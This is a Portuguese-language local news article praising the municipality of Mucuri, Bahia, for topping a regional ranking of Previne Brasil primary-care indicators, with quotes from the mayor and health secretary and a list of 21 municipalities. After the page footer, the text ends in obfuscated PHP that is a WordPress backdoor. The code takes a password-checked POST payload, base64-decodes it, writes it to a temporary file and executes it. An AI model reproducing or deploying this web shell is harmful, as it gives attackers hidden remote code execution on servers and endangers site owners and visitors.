• SEJA BEM-VINDO

Mucuri é 1º lugar na saúde pública no novo alcance dos indicadores por desempenho no Previne Brasil

Publicado em: 02/02/2024 Atualizado:: fevereiro 2, 2024

 

Os municípios de Mucuri, Caravelas, Vereda e Itagimirim se destacaram novamente no cumprimento das metas dos indicadores de saúde do Programa Previne Brasil na análise dos extratos de desempenho dos meses de setembro, outubro, novembro e dezembro de 2023. Nas últimas 9 avaliações do Ministério da Saúde, o município de Mucuri alcançou ineditamente o topo do ranking da saúde pública na região do extremo sul da Bahia, a cada ano mantendo os indicadores e notas excelentes, saindo do 14º lugar – posição ocupada em janeiro de 2021, quando a atual gestão assumiu o governo, chegando-se ao primeiríssimo lugar.

 

 

As notas após avaliação dos índices, mantinham o município de Mucuri no 3º lugar ainda no primeiro quadrimestre, 2º lugar no segundo quadrimestre e manteve a 2ª colocação no terceiro quadrimestre de 2021. Entre 2022 e 2023, Mucuri disputou o primeiro lugar com o município de Caravelas, quando quadrimestre um, hora quadrimestre outro. No penúltimo quadrimestre Mucuri figurou na lista dos territórios do Previne Brasil com mais de 14 PSFs, como o município com nota 09,98 – se classificando na 1ª colocação no Estado da Bahia. E em nível geral no Estado, o município de Mucuri ficou na 37ª colocação do Programa Previne Brasil – mas quando con sidera somente os municípios maiores e com mais de 14 PSFs em seus territórios, Mucuri assume a 1ª colocação no ranking em todo o Estado com nota 09,98, dentre os 417 municípios da Bahia.

 

 

O município de Mucuri possui atualmente 15 unidades ESF – Estratégia Saúde da Família, que são postos de saúde que controlam a saúde básica da população (Saúde da Família (eSF) e Atenção Primária (eAP), pelas quais o Previne Brasil mede o cumprimento das suas metas dos indicadores. Essa avaliação, instituída pela Portaria nº 2.979/19, modifica o modelo de financiamento da Atenção Primária a Saúde (APS) e cria mecanismos que induzem a responsabilização dos gestores e profissionais de saúde pelas pessoas que assistem. O Programa tem como princípio, a estruturação dos serviços e a o rganização dos processos de trabalho das equipes de saúde, para melhor atender a população que assistem.

 

 

De forma inédita nesta gestão, o município de Mucuri eleva a qualidade dos serviços ofertados em saúde pública e como fruto, o primeiro lugar entre os 21 municípios do extremo sul da Bahia, como melhor atenção básica de saúde. Com esse resultado, o prefeito Roberto Carlos Figueiredo Costa “Robertinho” (UB), parabenizou toda equipe, bem como ao secretário de saúde, Fernando Jardim, por mais uma vez elevar o nome de Mucuri e da saúde pública local. “O alcance deste índice são méritos das equipes de Saúde da Família que não mediram esforços para implementar melhorias nas ações e atendimentos prestados à comunidade, embora, temos muita coisa ainda por fazer”.

 

 

“Reconheço plenamente que só foi possível alcançar esse excelente resultado devido aos esforços dos profissionais de saúde, principalmente nos últimos 3 anos, dos quais exigimos ainda mais dedicação de todos. São profissionais que se empenham o máximo possível para oferecer saúde de excelência e humanizada para a nossa população, então gostaria de parabenizá-los e dizer que estamos juntos na construção de um novo tempo para o município de Mucuri”, agradeceu o prefeito Robertinho.

 

 

De acordo com o secretário Municipal de Saúde de Mucuri, Fernando Jardim, a consequência dos números vitoriosos na saúde pública local, são os frutos da persistência e do investimento do município, por meio da gestão do prefeito Robertinho, que nos primeiros 2 anos de governo, realizou uma grande ação de melhorias na saúde pública, elevando o município da 14ª posição para a 2ª posição no índice do Programa Previne Brasil. E em 2023, novos investimentos estratégicos continuaram sendo feitos por meio de ações inéditas nunca vistas antes no município e a soma disso tudo, é a conquista do 1º lugar na s aúde pública no novo alcance dos indicadores por desempenho no Previne Brasil.

 

 

O RANKING DOS 21 MUNICÍPIOS DO EXTREMO SUL

 

1° Mucuri
2° Caravelas
3º Vereda
4º Itagimirim
5º Ibirapuã
6º Medeiros Neto
7º Nova Viçosa
8º Jucuruçu
9° Itanhém
10° Lajedão
11º Guaratinga
12° Prado
13º Itabela
14º Teixeira de Freitas
15º Santa Cruz Cabrália
16º Eunápolis
17º Itapebi
18° Alcobaça
19º Belmonte
20º Itamaraju
21º Porto Seguro


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}